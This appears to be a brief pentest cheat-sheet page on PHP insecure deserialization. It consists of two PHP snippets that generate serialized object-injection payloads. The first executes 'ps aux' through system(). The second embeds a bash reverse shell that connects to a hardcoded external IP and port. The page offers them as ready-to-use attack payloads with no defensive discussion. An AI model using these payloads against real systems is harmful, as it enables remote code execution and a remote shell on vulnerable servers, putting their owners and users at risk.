PHP Insecure Deserialization





Last updated





Last updated
<?php
class PHPObjectInjection {
public $inject="system('ps aux');";
}
$obj=new PHPObjectInjection();
var_dump(serialize($obj));
?><?php
class PHPObjectInjection {
public $inject="system('/bin/bash -c \'bash -i >& /dev/tcp/192.142.148.2/54321 0>&1\'');";
}
$obj=new PHPObjectInjection();
var_dump(serialize($obj));
?>